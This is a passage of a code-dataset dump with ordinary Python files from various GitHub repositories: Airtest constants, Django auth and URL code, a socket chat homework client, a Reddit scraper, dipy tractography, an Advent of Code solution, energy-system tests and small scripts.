2208)]\n\n\nclass CAP_METHOD(object):\n MINICAP = \"MINICAP\"\n WDACAP = \"WDACAP\"\n MJPEG = \"MJPEG\"\n\n\n# wda default mjpeg server port number\nDEFAULT_MJPEG_PORT = 9100\n\n# now touch and ime only support wda\nclass TOUCH_METHOD(object):\n WDATOUCH = \"WDATOUCH\"\n\n\nclass IME_METHOD(object):\n WDAIME = \"WDAIME\"\n\n\nROTATION_MODE = {\n 0: wda.PORTRAIT,\n 270: wda.LANDSCAPE,\n 90: wda.LANDSCAPE_RIGHT,\n 180: wda.PORTRAIT_UPSIDEDOWN,\n}\n\n\nKEY_EVENTS = {\n \"home\": \"home\",\n \"volumeup\": \"volumeUp\",\n \"volumedown\": \"volumeDown\"\n}\n","repo_name":"AirtestProject/Airtest","sub_path":"airtest/core/ios/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":7514,"dataset":"github-code","pt":"37"}{"seq_id":"30909558803","text":"import functools\nfrom typing import Any, 
Callable, TypeVar\n\nfrom django.core.exceptions import PermissionDenied\nfrom django.utils.translation import gettext as _\n\nF = TypeVar(\"F\", bound=Callable[..., Any])\n\n\ndef permission_required(\n permissions: str | list[str] | set[str], *, all_required: bool = False\n) -> Callable[[Callable[..., Any]], Callable[..., Any]]:\n \"\"\"\n Decorator that can be used alongside any function to check if a user\n has a particular permission. Raises a PermissionDenied exception if user\n does not have the appropriate permission.\n \"\"\"\n\n def decorator(func: Any) -> Callable[..., Any]:\n @functools.wraps(func)\n def inner(*args: Any, **kwargs: Any) -> Any:\n *_arg, info = args\n\n try:\n user = info.auth\n\n if not user:\n raise PermissionDenied(_(\"User from context is unknown.\"))\n\n if not user.is_authenticated:\n raise PermissionDenied(_(\"User is unauthenticated.\"))\n\n if all_required:\n if not user.has_perms(permissions):\n raise PermissionDenied(\n _(\"You do not have all the required permissions.\")\n )\n elif isinstance(permissions, (list, set)):\n if not any(user.has_perm(perm) for perm in permissions):\n raise PermissionDenied(\n _(\"You do not have any of the required permissions.\")\n )\n else:\n if not user.has_perm(permissions):\n raise PermissionDenied(\n _(\"You do not have any of the required permissions.\")\n )\n\n return func(*args, **kwargs)\n except AttributeError as exc:\n raise AttributeError(\n \"Auth attribute on WSGIRequest does not exist. \"\n \"Ensure that authentication for the endpoint is enabled \"\n \"before using the permission_required decorator\"\n ) from exc\n\n return inner\n\n return decorator\n","repo_name":"danielkjellid/aria-api","sub_path":"aria/api_auth/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"38768660107","text":"# -*- encoding: utf-8 -*-\n'''\n@File : cheat_Client.py\n@Time : 2020/05/04 10:43:43\n@Author : xdbcb8 \n@Version : 1.0\n@Contact : 838025538@qq.com\n'''\n\n# here put the import lib\n\nimport socket\nimport threading\nimport os\n\n\nclass Client:\n def __init__(self):\n # create the socket\n self.s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n # connect\n\n self.addr = ('192.168.1.103', 9999)\n try:\n self.s.connect(self.addr)\n print('Connected to the server')\n except ConnectionRefusedError:\n print('Failed to connect to the server')\n os._exit(0)\n \n # receive messages\n def recv(self):\n while True:\n try:\n response = self.s.recv(1024)\n print(':'+response.decode('utf-8'))\n except ConnectionResetError:\n print('Server closed, chat ended')\n self.s.close()\n break\n os._exit(0)\n\n def send(self):\n print('Press Enter to send a message')\n print('Type \'esc\' to quit')\n while True:\n message = input()\n if message =='esc':\n print('Chat ended')\n self.s.close()\n break\n else:\n self.s.send(message.encode('utf-8'))\n\n os._exit(0)\n \n def start(self):\n threads = [threading.Thread(target=self.recv), threading.Thread(target=self.send)]\n for t in threads:\n t.start()\n\nif __name__ == \"__main__\":\n C = Client()\n C.start()\n","repo_name":"Liugenhao-gh/python_homework","sub_path":"homework9/4_cheat_Client.py","file_name":"4_cheat_Client.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}{"seq_id":"22558435031","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('login/', views.login_user, name='login'),\n path('logout/', views.logout_user, name='logout'),\n path('reg_doc/', views.register_doc, name='reg_doc'),\n path('reg_patient/', views.register_patient, name='reg_patient'),\n path('reg_hospital/', views.register_hospital, name='reg_hospital'),\n path('error/', views.error, name='error'),\n\n\n\n]\n","repo_name":"Panks23/Patient-Doctor-Hospital-Management","sub_path":"project_dashboard/login_reg/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"41608896675","text":"import pmaw\nimport os\nimport pandas as pd\nimport logging\nimport argparse as arg\nimport multiprocessing\nimport sys\nimport datetime\nimport csv\nfrom itertools import chain\n\nabspath = os.path.abspath(__file__)\ndname = os.path.dirname(abspath)\nos.chdir(dname)\nprocesses = 64\n\nparser = arg.ArgumentParser()\nparser.add_argument('subreddits', type=str, help='csv list of subreddits to pull')\nparser.add_argument('t', type=str, help='type of information to pull, either Submissions or Comments')\n\nargs = parser.parse_args(sys.argv[1:])\n\n\nlogging.basicConfig(\n level=logging.INFO,\n filename=f'../../Files/logs/pull_subs{datetime.datetime.today()}.log',\n filemode='a',\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n datefmt='%d-%b-%y %H:%M:%S'\n)\n\ndef pullSubredditSubmissions(subreddit): # Pulls a subreddit from reddit and saves it to a file\n api = pmaw.PushshiftAPI(num_workers=15, jitter='full')\n start = int(datetime.datetime(2020, 3, 1).timestamp())\n end = int(datetime.datetime(2021, 2, 28).timestamp())\n results = api.search_submissions(\n subreddit=subreddit, \n after=start, \n before=end,\n mem_safe=True,\n filter = ('author', \n 'title',\n 'created_utc',\n 'selftext',\n 'url',\n 'id',\n 'score',\n 'num_comments',\n 'subreddit',\n 'permalink')\n )\n\n temp1 = pd.DataFrame([thing for thing in results])\n start = int(datetime.datetime(2021, 3, 1).timestamp())\n end = int(datetime.datetime(2022, 3, 31).timestamp())\n results = api.search_submissions(\n subreddit=subreddit, \n after=start, \n before=end,\n mem_safe=True,\n filter = ('author', \n 'title',\n 'created_utc',\n 'selftext',\n 'url',\n 'id',\n 'score',\n 'num_comments',\n 'subreddit',\n 'permalink')\n )\n temp2 = pd.DataFrame([thing for thing in results])\n temp = pd.concat([temp1, temp2])\n logging.info(f'Pulled subreddit {subreddit} number of posts: {len(temp)}')\n temp.to_pickle(f'../../Files/Submissions/{subreddit}.pickle')\n\ndef pullSubredditComments(subreddit): # Pulls the comments of a subreddit from reddit\n api = pmaw.PushshiftAPI(num_workers=15, rate_limit=100, jitter='full')\n start = int(datetime.datetime(2020, 3, 1).timestamp())\n end = int(datetime.datetime(2022, 3, 31).timestamp()) \n results = api.search_comments(\n subreddit=subreddit,\n after=start,\n before=end,\n mem_safe=True,\n filter = ('author',\n 'body',\n 'created_utc',\n 'id',\n 'score',\n 'permalink',\n 'subreddit',\n 'parent_id')\n ) \n\n temp = pd.DataFrame([thing for thing in results])\n logging.info(f'Pulled subreddit {subreddit} number of comments: {len(temp)}')\n temp.to_pickle(f'../../Files/Comments/{subreddit}.pickle')\n\ndef find_existing_pulls(type, subreddits): #remove existing pulls from subreddits list\n done = os.listdir(f'../../Files/{type}/')\n for i in done:\n done[done.index(i)] = i[:-7]\n res = [i 
for i in subreddits if i not in done]\n return res\n\n\ndef main(subreddits, type):\n if type == 'Submissions':\n subreddits = find_existing_pulls(type, subreddits)\n logging.info(f'start, pulling {type} for {len(subreddits)} subreddits')\n for subreddit in subreddits:\n pullSubredditSubmissions(subreddit)\n elif type == 'Comments':\n subreddits = find_existing_pulls(type, subreddits)\n logging.info(f'start, pulling {type} for {len(subreddits)} subreddits')\n for subreddit in subreddits:\n pullSubredditComments(subreddit)\n else:\n raise NameError('Please indicate of action to be done')\n quit()\n\n logging.info('finished')\n\n\nwith open(args.subreddits, newline='') as f:\n reader = csv.reader(f)\n subreddits = list(reader)\n\nsubreddits = list(chain.from_iterable(subreddits))\n\nif __name__ == '__main__':\n main(subreddits, args.t)","repo_name":"jvschlierf/networkthesis","sub_path":"Preprocessing/pull_subs_2.py","file_name":"pull_subs_2.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"579305839","text":"#!/usr/bin/env python\n\nfrom argparse import ArgumentParser\n\nfrom dipy.tracking.streamline import Streamlines\nfrom dipy.core.gradients import gradient_table\nfrom dipy.reconst.shm import CsaOdfModel\nfrom dipy.reconst.csdeconv import (ConstrainedSphericalDeconvModel,\n auto_response)\nfrom dipy.tracking.local_tracking import LocalTracking\nfrom dipy.tracking.stopping_criterion import ThresholdStoppingCriterion\nfrom dipy.direction import ProbabilisticDirectionGetter, peaks_from_model\nfrom dipy.io.stateful_tractogram import Space, StatefulTractogram\nfrom dipy.io.streamline import save_trk, load_trk\nfrom dipy.io import read_bvals_bvecs\nfrom dipy.data import default_sphere\nfrom dipy.tracking import utils\nfrom dipy.viz import has_fury\nfrom nibabel.streamlines import ArraySequence\nfrom onevox.cli import driver as ov\n\n\nimport nibabel as nib\nimport numpy as np\nimport os.path as op\nimport os\nimport json\nimport matplotlib\nmatplotlib.use('AGG')\n\nimport matplotlib.pyplot as plt\n\n\ndef make_descriptor(parser, arguments=None):\n import boutiques.creator as bc\n\n basename = \"dipy_tracking\"\n desc = bc.CreateDescriptor(parser, execname=op.basename(basename),\n tags={\"domain\": [\"neuroinformatics\",\n \"image processing\",\n \"mri\", \"noise\"]})\n desc.save(basename + \".json\")\n\n if arguments is not None:\n invo = desc.createInvocation(arguments)\n invo.pop(\"boutiques\")\n\n with open(basename + \"_inputs.json\", \"w\") as fhandle:\n fhandle.write(json.dumps(invo, indent=4))\n\n\ndef wrap_fuzzy_failures(fn, args=[], kwargs={}, errortype=Exception,\n failure_threshold=9, verbose=False):\n failure_count = 0\n while True:\n try:\n result = fn(*args, **kwargs)\n break\n except errortype:\n failure_count += 1\n if verbose:\n print(\"Failure in {0} ({1} of {2})\".format(fn.__name__,\n failure_count,\n failure_threshold))\n if failure_count > failure_threshold:\n raise(FloatingPointError(\"Too many failures; stopping.\"))\n return result\n\n\ndef tracking(image, bvecs, bvals, wm, seeds, fibers, prune_length=3, rseed=42,\n plot=False, proba=False, verbose=False):\n # Pipelines transcribed from:\n # https://dipy.org/documentation/1.1.1./examples_built/tracking_introduction_eudx/#example-tracking-introduction-eudx\n # https://dipy.org/documentation/1.1.1./examples_built/tracking_probabilistic/\n\n # Load Images\n dwi_loaded = nib.load(image)\n dwi_data = 
dwi_loaded.get_fdata()\n\n wm_loaded = nib.load(wm)\n wm_data = wm_loaded.get_fdata()\n\n seeds_loaded = nib.load(seeds)\n seeds_data = seeds_loaded.get_fdata()\n seeds = utils.seeds_from_mask(seeds_data, dwi_loaded.affine, density=2)\n\n # Load B-values & B-vectors\n # NB. Use aligned b-vecs if providing eddy-aligned data\n bvals, bvecs = read_bvals_bvecs(bvals, bvecs)\n gtab = gradient_table(bvals, bvecs)\n csa_model = CsaOdfModel(gtab, sh_order=6)\n\n # Set stopping criterion\n gfa = csa_model.fit(dwi_data, mask=wm_data).gfa\n stop_criterion = ThresholdStoppingCriterion(gfa, .25)\n\n if proba:\n # Establish ODF model\n response, ratio = auto_response(gtab, dwi_data, roi_radius=10,\n fa_thr=0.7)\n csd_model = ConstrainedSphericalDeconvModel(gtab, response, sh_order=6)\n csd_fit = csd_model.fit(dwi_data, mask=wm_data)\n\n # Create Probabilisitic direction getter\n fod = csd_fit.odf(default_sphere)\n pmf = fod.clip(min=0)\n prob_dg = ProbabilisticDirectionGetter.from_pmf(pmf, max_angle=30.,\n sphere=default_sphere)\n # Use the probabilisitic direction getter as the dg\n dg = prob_dg\n\n else:\n # Establish ODF model\n csa_peaks = peaks_from_model(csa_model, dwi_data, default_sphere,\n relative_peak_threshold=0.8,\n min_separation_angle=45,\n mask=wm_data)\n\n # Use the CSA peaks as the dg\n dg = csa_peaks\n\n # Create generator and perform tracing\n s_generator = LocalTracking(dg, stop_criterion, seeds, dwi_loaded.affine,\n 0.5, random_seed=rseed)\n streamlines = Streamlines(s_generator)\n\n # Prune streamlines\n streamlines = ArraySequence([strline\n for strline in streamlines\n if len(strline) > prune_length])\n sft = StatefulTractogram(streamlines, dwi_loaded, Space.RASMM)\n\n # Save streamlines\n save_trk(sft, fibers + \".trk\")\n\n # Visualize fibers\n if plot and has_fury:\n from dipy.viz import window, actor, colormap as cmap\n\n # Create the 3D display.\n r = window.Renderer()\n r.add(actor.line(streamlines, cmap.line_colors(streamlines)))\n window.record(r,\n out_path=fibers + '.png',\n size=(800, 800))\n\n\ndef streamlines2graph(streamlines, affine, parcellation, output_file):\n # Load Images\n parcellation_loaded = nib.load(parcellation)\n parcellation_data = parcellation_loaded.get_fdata()\n\n uniq = np.unique(parcellation_data)\n parcellation_data = parcellation_data.astype(int)\n if list(uniq) != list(np.unique(parcellation_data)):\n raise TypeError(\"Parcellation labels should be integers.\")\n\n # Perform tracing\n graph, mapping = utils.connectivity_matrix(streamlines, affine,\n parcellation_data,\n symmetric=True,\n return_mapping=True)\n # Deleting edges with the background\n graph = np.delete(graph, (0), axis=0)\n graph = np.delete(graph, (0), axis=1)\n map_keys = sorted(mapping.keys())\n\n np.savetxt(output_file + \".mat\", graph)\n with open(output_file + \"_mapping.json\", \"w\") as fhandle:\n for k in map_keys:\n # ignore background fibers\n if 0 in k:\n continue\n v = mapping[k]\n fhandle.write(\"{0}\\t{1}\\t{2}\\n\".format(k[0], k[1],\n \",\".join([str(_)\n for _ in v])))\n\n plt.imshow(np.log1p(graph), interpolation='nearest')\n try:\n plt.savefig(output_file + \".png\")\n except ValueError:\n pass\n\n\ndef main(args=None):\n parser = ArgumentParser(\"dipy_tracking.py\",\n description=\"Generates streamlines and optionally \"\n \"a connectome from a set of diffusion \"\n \"volumes and parameter files.\")\n parser.add_argument(\"diffusion_image\",\n help=\"Image containing a stack of DWI volumes, ideally\"\n \" preprocessed, to be used for tracing. 
If this \"\n \"is a nifti image, the image is used directly. If\"\n \" it is a JSON file, it is expected to be an \"\n \"output from the 'oneVoxel' noise-simulation tool\"\n \" and the image will be regenerated using the \"\n \"parameters contained in the JSON file.\")\n parser.add_argument(\"bvecs\",\n help=\"The b-vectors corresponding to the diffusion \"\n \"images. If the images have been preprocessed \"\n \"then the rotated b-vectors should be used.\")\n parser.add_argument(\"bvals\",\n help=\"The b-values corresponding to the diffusion \"\n \"images. \")\n parser.add_argument(\"whitematter_mask\",\n help=\"A white matter mask generated from a structural \"\n \"image that has been transformed into the same \"\n \"space as the diffusion images.\")\n parser.add_argument(\"seed_mask\",\n help=\"A seed mask, recommended as the white matter and\"\n \" gray matter boundary. This can be derived from \"\n \"the white matter mask by dilating the image and \"\n \"subtracting the original mask.\")\n parser.add_argument(\"output_directory\",\n help=\"The directory in which the streamlines and \"\n \"optionally graphs and figures will be saved in.\")\n parser.add_argument(\"--labels\", \"-l\", nargs=\"+\",\n help=\"Optional nifti image containing co-registered \"\n \"region labels pertaining to a parcellation. This\"\n \" file will be used for generating a connectome \"\n \"from the streamlines.\")\n parser.add_argument(\"--verbose\", \"-v\", action=\"store_true\",\n help=\"Toggles verbose or quiet output printing.\")\n parser.add_argument(\"--prob\", \"-P\", action=\"store_true\",\n help=\"Toggles probabilistic tracking. Default: det.\")\n parser.add_argument(\"--prune\", \"-p\", action=\"store\", type=int, default=3,\n help=\"Dictates the minimum length of fibers to keep. \"\n \"If fibers are shorter than the value, exclusive,\"\n \"then they will be thrown out. Default value is \"\n \"3 nodes in the fiber.\")\n parser.add_argument(\"--random_seed\", \"-r\", action=\"store\", type=int,\n default=42,\n help=\"Random seed to be used in tractography.\")\n parser.add_argument(\"--streamline_plot\", \"-s\", action=\"store_true\",\n help=\"Toggles the plotting of streamlines. 
This \"\n \"requires VTK.\")\n parser.add_argument(\"--boutiques\", action=\"store_true\",\n help=\"Toggles creation of a Boutiques descriptor and \"\n \"invocation from the tool and inputs.\")\n\n results = parser.parse_args() if args is None else parser.parse_args(args)\n\n # Just create the descriptor and exit if we set this flag.\n if results.boutiques:\n make_descriptor(parser, results)\n return 0\n\n verbose = results.verbose\n image = results.diffusion_image\n bn = op.basename(image).split('.')[0]\n outdir = op.join(results.output_directory,\n bn.split(\"_\")[0],\n bn.split(\"_\")[1],\n \"dwi\")\n try:\n os.makedirs(outdir)\n except FileExistsError:\n pass\n\n noised = True if image.endswith(\".json\") else False\n if noised:\n noise_file = image\n # Load noise parameters\n with open(image, 'r') as fhandle:\n noise_data = json.loads(fhandle.read())\n\n # Apply noise to image\n in_image = noise_data[\"base_image\"]\n ov(in_image, outdir, apply_noise=noise_file, verbose=results.verbose)\n image = noise_file.replace('.json', '.nii.gz')\n\n rs = results.random_seed\n trackmod = \"prob\" if results.prob else \"det\"\n fibers = op.join(outdir, \"{0}_{1}_rs{2}\".format(bn, trackmod, rs))\n if not op.isfile(fibers + \".trk\"):\n wrap_fuzzy_failures(tracking,\n args=[image, results.bvecs, results.bvals,\n results.whitematter_mask, results.seed_mask,\n fibers],\n kwargs={\"plot\": results.streamline_plot,\n \"verbose\": verbose,\n \"rseed\": rs,\n \"proba\": results.prob},\n errortype=Exception,\n failure_threshold=5,\n verbose=verbose)\n\n tractog = load_trk(fibers + \".trk\", 'same', Space.RASMM)\n streamlines = tractog.streamlines\n\n if results.labels:\n graphs = []\n for label in results.labels:\n lbn = op.basename(label).split('.')[0].split(\"_\")[-1]\n graphs += [op.join(outdir, \"{0}_{1}_rs{2}_{3}\".format(bn, trackmod,\n rs, lbn))]\n streamlines2graph(streamlines, tractog.affine, label, graphs[-1])\n\n if noised:\n # Delete noisy image\n ov(image, outdir, clean=True, apply_noise=noise_file, verbose=verbose)\n\n if verbose:\n print(\"Streamlines: {0}\".format(fibers))\n print(\"Graphs: {0}\".format(\", \".join(graphs)))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gkiar/stability-impact","sub_path":"code/processing/tractography/dipy_tracking.py","file_name":"dipy_tracking.py","file_ext":"py","file_size_in_byte":13026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16727521092","text":"import time\nfrom typing import Union\n\nclass DiracDice:\n\n def __init__(self, p1_pos: int, p2_pos: int, p1_score: int, p2_score: int, max_score: int):\n self.p1_pos = p1_pos\n self.p2_pos = p2_pos\n self.p1_score = p1_score\n self.p2_score = p2_score\n self.max_score = max_score\n self.finished = False\n self.p1_wins = None\n\n def advance_p1(self, value: int):\n self.p1_pos += value\n if self.p1_pos > 10:\n self.p1_pos -= 10\n self.p1_score += self.p1_pos\n \n def advance_p2(self, value: int):\n self.p2_pos += value\n if self.p2_pos > 10:\n self.p2_pos -= 10\n self.p2_score += self.p2_pos\n\n def check(self):\n if self.p1_score >= self.max_score:\n self.finished = True\n self.p1_wins = True\n if self.p2_score >= self.max_score:\n self.finished = True\n self.p1_wins = False\n\ndef run_script(filepath: str) -> Union[int, str, float, bool]:\n with open(filepath, \"r\") as f:\n raw_data = f.read()\n return main_function(raw_data)\n\ndef main_function(raw_data: str) -> Union[int, str, float, bool]:\n start_time = time.time()\n \n 
result = your_script(raw_data)\n\n elapsed_time = time.time() - start_time\n print(f\"Time elapsed : {elapsed_time}s\")\n return result\n\ndef your_script(raw_data: str) -> Union[int, str, float, bool]:\n lines = raw_data.split(\"\\n\")\n p1_pos = int(lines[0][-2:])\n p2_pos = int(lines[1][-2:])\n print(f\"Part 1: {part_one(p1_pos, p2_pos)}\")\n\ndef part_one(p1_pos: int, p2_pos: int) -> int:\n dice = 1\n turn_count = 0\n game = DiracDice(p1_pos, p2_pos, 0, 0, 1000)\n while not game.finished:\n progress = (dice * 3 + 3) % 10\n if turn_count % 2 == 0:\n game.advance_p1(progress)\n else:\n game.advance_p2(progress)\n turn_count += 1\n dice += 3\n game.check()\n if dice >= 10:\n dice = dice - 10\n if game.p1_wins:\n return game.p2_score * turn_count * 3\n else:\n return game.p1_score * turn_count * 3\n\nif __name__ == \"__main__\":\n print(run_script(\"input.txt\"))","repo_name":"Regcent/AoC_2021","sub_path":"Day21/aoc_21.py","file_name":"aoc_21.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"3997155275","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\n\nclass CustomUser(AbstractUser):\n role = models.CharField(max_length=16)\n\n\nclass TimeSlot(models.Model):\n user = models.ForeignKey(\"CustomUser\", blank=True, null=True, on_delete=models.CASCADE)\n start_time = models.DateTimeField()\n end_time = models.DateTimeField()\n\n def __str__(self):\n return f\"{self.user.username}: {self.start_time} --> {self.end_time}\"\n\n\n","repo_name":"saljoedassery/interview-scheduler","sub_path":"scheduler/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"11127398488","text":"from src import ModuleManager, utils\n\nclass Module(ModuleManager.BaseModule):\n @utils.hook(\"received.command.which\")\n @utils.kwarg(\"min_args\", 1)\n @utils.kwarg(\"help\", \"Find where a command is provided\")\n @utils.kwarg(\"usage\", \"<command>\")\n def which(self, event):\n command = event[\"args_split\"][0].lower()\n hooks = self.events.on(\"received.command\").on(command).get_hooks()\n if not hooks:\n raise utils.EventError(\"Unknown command '%s'\" % command)\n\n hook = hooks[0]\n module = self.bot.modules.from_context(hook.context)\n event[\"stdout\"].write(\"%s%s is provided by %s.%s\" % (\n event[\"command_prefix\"], command, module.name,\n hook.function.__name__))\n","repo_name":"chiefnoah/bitbot","sub_path":"modules/which.py","file_name":"which.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}{"seq_id":"29243727879","text":"import numpy as np\nimport soundfile as sf\n\n# load the audio file\naudio_path = r\"C:\\Users\\vivira\\OneDrive - mails.jlu.edu.cn\\文档\\Soulseek Downloads\\Soulseek Shared Folder\\少女前线交响音乐会\\东京公演\\Chapter 02.flac\"\ny, sr = sf.read(audio_path)\n\n\n# adjust the gain to a target average loudness (librosa has no effects.normalize,\n# so scale to a target RMS of -20 dBFS manually)\nrms = np.sqrt(np.mean(y ** 2))\ny = y * (10 ** (-20 / 20) / rms)\n\n# save the adjusted audio as FLAC\noutput_path = r'your_output_audio_file_path.flac'\nsf.write(output_path, y, sr)\n","repo_name":"Crimone/flac-auto-renamer","sub_path":"均衡flac音量.py","file_name":"均衡flac音量.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"562794617","text":"import FINE as fn\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom 
pyomo.opt import SolverFactory\n\n\n@pytest.mark.skipif(\n not SolverFactory(\"gurobi\").available(),\n reason=\"QP solver required (check for license)\",\n)\ndef test_LPinvest(minimal_test_esM):\n \"\"\"\n Get the minimal test system, and check if invest of Electrolyzer without quadratic approach is unchanged.\n \"\"\"\n esM = minimal_test_esM\n\n esM.optimize(timeSeriesAggregation=False, solver=\"gurobi\")\n\n # get TAC of Electrolyzer\n\n invest = (\n esM.getOptimizationSummary(\"ConversionModel\")\n .loc[\"Electrolyzers\"]\n .loc[\"invest\"][\"ElectrolyzerLocation\"]\n .values.astype(int)[0]\n )\n\n assert invest == 8571428\n\n\n@pytest.mark.skipif(\n not SolverFactory(\"gurobi\").available(),\n reason=\"QP solver required (check for license)\",\n)\ndef test_QPinvest():\n numberOfTimeSteps = 4\n hoursPerTimeStep = 2190\n\n # Create an energy system model instance\n esM = fn.EnergySystemModel(\n locations={\"location1\"},\n commodities={\"electricity\", \"hydrogen\"},\n numberOfTimeSteps=numberOfTimeSteps,\n commodityUnitsDict={\n \"electricity\": r\"kW$_{el}$\",\n \"hydrogen\": r\"kW$_{H_{2},LHV}$\",\n },\n hoursPerTimeStep=hoursPerTimeStep,\n costUnit=\"1 Euro\",\n lengthUnit=\"km\",\n verboseLogLevel=2,\n )\n\n # time step length [h]\n timeStepLength = numberOfTimeSteps * hoursPerTimeStep\n\n # Buy electricity at the electricity market\n costs = pd.Series([0.5, 0.4, 0.2, 0.5], index=[0, 1, 2, 3])\n esM.add(\n fn.Source(\n esM=esM,\n name=\"Electricity market\",\n commodity=\"electricity\",\n hasCapacityVariable=False,\n commodityCostTimeSeries=costs,\n )\n ) # euro/kWh\n\n # Electrolyzers\n esM.add(\n fn.Conversion(\n esM=esM,\n name=\"Electrolyzer\",\n physicalUnit=r\"kW$_{el}$\",\n commodityConversionFactors={\"electricity\": -1, \"hydrogen\": 0.7},\n hasCapacityVariable=True,\n investPerCapacity=500, # euro/kW\n opexPerCapacity=500 * 0.025,\n interestRate=0.08,\n economicLifetime=10,\n QPcostScale=0.1,\n capacityMin=0,\n capacityMax=10,\n )\n )\n\n # Industry site\n demand = pd.Series([10000.0, 10000.0, 10000.0, 10000.0], index=[0, 1, 2, 3])\n esM.add(\n fn.Sink(\n esM=esM,\n name=\"Industry site\",\n commodity=\"hydrogen\",\n hasCapacityVariable=False,\n operationRateFix=demand,\n )\n )\n\n # Optimize (just executed if gurobi is installed)\n esM.optimize(timeSeriesAggregation=False, solver=\"gurobi\")\n invest = round(\n esM.getOptimizationSummary(\"ConversionModel\")\n .loc[\"Electrolyzer\"]\n .loc[\"invest\"][\"location1\"]\n .values.astype(float)[0],\n 3,\n )\n assert invest == 3148.179\n\n # flag = True\n # try:\n # esM.optimize(timeSeriesAggregation=False, solver=\"gurobi\")\n # except:\n # flag = False\n\n # if flag:\n # invest = round(\n # esM.getOptimizationSummary(\"ConversionModel\")\n # .loc[\"Electrolyzer\"]\n # .loc[\"invest\"][\"location1\"]\n # .values.astype(float)[0],\n # 3,\n # )\n # assert invest == 3148.179\n","repo_name":"FZJ-IEK3-VSA/FINE","sub_path":"test/test_QPinvest.py","file_name":"test_QPinvest.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"37"}{"seq_id":"27163349192","text":"from random import randint\n\n#Encoder Main\ndef mainEncoder(string=None):\n if string is None:\n string = input(\"Please enter your message: \")\n #Catch string from transformStr function\n scrambledStr = transformStr(string)\n makeSecret(scrambledStr)\n\n#Transform string\ndef transformStr(string):\n ordStr = \"\"\n #Convert letters to ASCII\n for i in string:\n ordStr += 
str(len(str(ord(i)))) + str(randint(10,99)) + str(ord(i)) + str(randint(10,99)) + \" \"\n return ordStr\n\n#Convert scrambled string to File\ndef makeSecret(scrambledStr):\n f = open('secret.txt','w')\n f.write(scrambledStr)\n f.close()\n\nx=\"This is a sentence\"\nmainEncoder(x)\n","repo_name":"PDXDevCampJuly/daniel_pearl","sub_path":"python/EncodingAdv.py","file_name":"EncodingAdv.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"11066911150","text":"import numpy as np\nimport matplotlib.pyplot as plt\ndata = np.loadtxt(\"jet_multiplicity_err\")\nexp_data = np.loadtxt(\"exp\")\ndef_data = np.loadtxt(\"MCplot\")\n\nplt.figure()\nx = [2, 3, 4, 5, 6]\nplt.errorbar(x, data.T[0], yerr=data.T[1], fmt='o', markersize=1, label='Pythia', capsize=2, elinewidth=0.5)\nplt.yscale(\"log\")\nplt.xlim(1, 7)\nplt.errorbar(exp_data.T[1], exp_data.T[3], yerr=exp_data.T[4], fmt='o', markersize=1, label='ATLAS(2011)', capsize=2, elinewidth=0.5)\nplt.errorbar(def_data.T[1], def_data.T[3], yerr=def_data.T[4], fmt='o', markersize=1, label='default', capsize=2, elinewidth=0.5)\nplt.ylabel(\"$\\\\sigma$ [pb]\")\nplt.xlabel(\"$N_\\\\mathrm{jet}$\")\nplt.legend()\nplt.title(\"Inclusive jet multiplicity ($R=0.4$)\")\nplt.savefig(\"JetMulti.pdf\")\nplt.show()\n\n","repo_name":"TianyuDai/pp_Cross_Section","sub_path":"Jet_Cross_Section/Result_multi/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"24703796208","text":"from math import gcd\n\nT = int(input())\nresult = []\n\nfor i in range(T) :\n A, B = map(int, input().split())\n result.append(A*B//gcd(A, B))\n\nfor j in range(T) :\n print(result[j])","repo_name":"Sonjieun2/AlgorithmStudy","sub_path":"Baekjoon/2023_7/0707/1934.py","file_name":"1934.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"35764067300","text":"try: # py3\n from shlex import quote\nexcept ImportError: # py2\n from pipes import quote\nimport click\nimport hashlib\nimport logging\nimport os\nimport subprocess\nimport sys\nimport time\n\nfrom threading import Thread\nfrom getpass import getuser\n\nfrom ray.autoscaler.tags import TAG_RAY_NODE_STATUS, TAG_RAY_RUNTIME_CONFIG, \\\n STATUS_UP_TO_DATE, STATUS_UPDATE_FAILED, STATUS_WAITING_FOR_SSH, \\\n STATUS_SETTING_UP, STATUS_SYNCING_FILES\nfrom ray.autoscaler.log_timer import LogTimer\n\nlogger = logging.getLogger(__name__)\n\n# How long to wait for a node to start, in seconds\nNODE_START_WAIT_S = 